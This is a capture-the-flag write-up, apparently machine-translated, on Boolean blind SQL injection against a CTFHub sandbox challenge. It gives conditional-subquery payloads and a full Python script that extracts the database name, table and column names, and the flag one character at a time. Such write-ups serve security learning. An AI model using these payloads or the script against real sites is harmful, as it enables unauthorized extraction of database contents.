CTFHub Boolean blind note

CTFHub Boolean blind note

The topic has been shown to be Boolean blind. It is found that it is not closed, but also filtered. It is also a basic problem, but it is found that the echo is not right:
payload:?id=1 and 's'='p'
Echo is query < success
This problem is different from the common Boolean blind annotation. The common Boolean blind annotation (I don't do much either) is that the database query result is empty or the query statement reports an error and the error is echoed. This question is whether the database query is empty, return or success. Only when the query statement reports an error can the error be returned.

You can click on the sql command line interface:

In this way, ordinary and followed by Boolean blind annotation statements are not easy to use, because they are judged according to the null query result.
Now I want to use if statement

if(expr1,expr2,expr3), if the value of expr1 is true, the expr2 statement is executed, if the value of expr1 is false, the expr3 statement is executed.

Then you can insert the judgment statement at expr1, put the correct syntax sql statement at expr1, and put the wrong syntax sql statement at expr2
payload:

?id=if(1=1,1,union select)`
?id=if(1=2,1,union select)

However, the idea is good, the reality is cruel:
When mysql executes this statement, it will first judge whether there is any error in the whole statement, so no matter where expr1 is, it is an error.
At this time to Baidu, there is no useful way.
This is to think of subquery

Subquery format: select * from users where id=(select username from users);

But there is a requirement that the result of a subquery must only have one record, otherwise an error will be reported
payload:

?id=if(1=1,1,(select table_name from information_schema.tables))
?id=if(1=2,1,(select table_name from information_schema.tables))

Query for injection statement in expr1You can get the first letter of the database name as s
Running with Python script, semi-automatic,,, it's a bit slow, and the total running time is about 2 minutes

import requests
import time

urlOPEN = 'http://challenge-80bbba4d1e9ce716.sandbox.ctfhub.com:10080/?id='
starOperatorTime = [] 
mark = 'query_success'
 
def database_name():
	name = ''
	for j in range(1,9):
		for i in 'sqcwertyuioplkjhgfdazxvbnm':
			url = urlOPEN+'if(substr(database(),%d,1)="%s",1,(select table_name from information_schema.tables))' %(j,i)
			# print(url+'%23')
			r = requests.get(url)
			if mark in r.text:
				name = name+i
				
				print(name)
				
				break
	print('database_name:',name)
	
		
	
database_name()
 
def table_name():
    list = []
    for k in range(0,4):
        name=''
        for j in range(1,9):
            for i in 'sqcwertyuioplkjhgfdazxvbnm':
                url = urlOPEN+'if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' %(k,j,i)
			    # print(url+'%23')
                r = requests.get(url)
                if mark in r.text:
                    name = name+i
                    break
        list.append(name)
    print('table_name:',list)

#start = time.time()
table_name()
#stop = time.time()
#starOperatorTime.append(stop-start)
#print("average time used:" + str(sum(starOperatorTime)/100))

def column_name():
    list = []
    for k in range(0,3): #There are at most 4 fields in the judgment table
        name=''
        for j in range(1,9): #Judge that a field name consists of 9 characters at most
            for i in 'sqcwertyuioplkjhgfdazxvbnm':
                url=urlOPEN+'if(substr((select column_name from information_schema.columns where table_name="flag"and table_schema= database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' %(k,j,i)
                r=requests.get(url)
                if mark in r.text:
                    name=name+i
                    break
        list.append(name)
    print ('column_name:',list)

column_name()

def get_data():
        name=''
        for j in range(1,50): #Judge that a value consists of 51 characters at most
            for i in range(48,126):
                url=urlOPEN+'if(ascii(substr((select flag from flag),%d,1))=%d,1,(select table_name from information_schema.tables))' %(j,i)
                r=requests.get(url)
                if mark in r.text:
                    name=name+chr(i)
                    print(name)
                    break
        print ('value:',name)
    
get_data()

Fix it!
This problem is mainly to find those statements that have no syntax errors, but do not meet the conditions. For example, the number of columns after union select must be the same as the number of columns before query, because you choose to insert payload and select subquery.

Published 8 original articles, won praise 2, visited 224
Private letter follow

Tags: Database SQL MySQL Python

Posted on Sat, 22 Feb 2020 22:57:42 -0500 by Toxinhead